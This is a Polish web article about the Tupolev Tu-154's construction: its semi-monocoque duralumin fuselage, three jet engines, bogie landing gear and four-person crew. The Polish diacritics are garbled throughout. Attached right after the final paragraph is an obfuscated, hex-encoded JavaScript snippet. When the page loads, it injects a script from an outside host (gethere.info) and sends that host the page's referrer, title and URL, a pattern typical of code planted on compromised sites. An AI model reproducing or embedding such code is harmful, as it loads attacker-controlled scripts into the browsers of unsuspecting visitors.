RozwiA�zania konstrukcyjne Tupolewa

Nie da siA� ukryA�, A?e podczas tworzenia Tu-154 konstruktorzy Biura Projektowego Tupolewa mieli do wypeA�nienia niezwykle ciA�A?kie zadanie. Z jednej strony presjA� wywieraA�y naA�oA?one na nich wymagania. Z drugiej natomiast najwyA?sze organy paA�stwowe, ktA?re mogA�y surowo ukaraA� poraA?kA�. InA?ynierowie starali siA� zatem zastosowaA� moA?liwie najnowoczeA�niejsze oraz najbardziej efektywne rozwiA�zania konstrukcyjne.

Omawiany model Tupolewa jest trA?jsilnikowym samolotem pasaA?erskim. KaA?dy z napA�dzajA�cych agregatA?w zostaA� wykonany w technologii odrzutowej i zapewniaA� sporA� iloA�A� siA�y. To zagadnienie o wiele bardziej szczegA?A�owo zostaA�o jednak potraktowane w dziale dotyczA�cym danych technicznych Tu-154.

JeA?eli chodzi o samA� konstrukcjA�, to zostaA�a ona wykonana w technologii pA?A�skorupowej. Oznacza to mniej wiA�cej tyle, A?e pod pokryciem zewnA�trznym stosuje siA� sporA� iloA�A� wrA�g i podA�uA?nic. KadA�ub taki charakteryzuje siA� sporA� wytrzymaA�oA�ciA� i sztywnoA�ciA� oraz niskA� wagA�. PrzewaA?ajA�cym materiaA�em konstrukcyjnym staA� siA� dural. Jest to nic innego, niA? stop aluminium, miedzi, manganu i magnezu. W ten sposA?b otrzymuje siA� metal, ktA?ry moA?e nie jest nadmiernie odporny na korozjA�, jednak ma A�wietne wA�aA�ciwoA�ci mechaniczne. Aby polepszyA� odpornoA�A� duralu na rdzA�, najczA�A�ciej stosuje siA� platerowanie czystym aluminium.

Podczas startu i lA�dowania piloci Tupolewa Tu-154 majA� do dyspozycji zawieszenie trA?jwA?zkowe i koA�o przednie. Zawieszenie trA?jwA?zkowe oznacza, A?e w kaA?dym z dwA?ch, tylnych zawieszeA� umocowane sA� trzy pary kA?A�.A� RozwiA�zanie takie daje ogromnA� sztywnoA�A� i stabilnoA�A� samolotu. Ponadto umoA?liwia takA?e lA�dowanie nawet na maA�ych lotniskach o infrastrukturze w zA�ym stanie technicznym.

ObsA�ugA� Tu-154 w powietrzu musi siA� zajA�A� czteroosobowa zaA�oga. W kokpicie wymagana jest obecnoA�A� pierwszego i drugiego pilota, nawigatora oraz mechanika pokA�adowego. OczywiA�cie kaA?da z tych osA?b musi przejA�A� szkolenie oraz zapoznaA� siA� z warunkami eksploatacji tego typu samolotu odrzutowego.var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}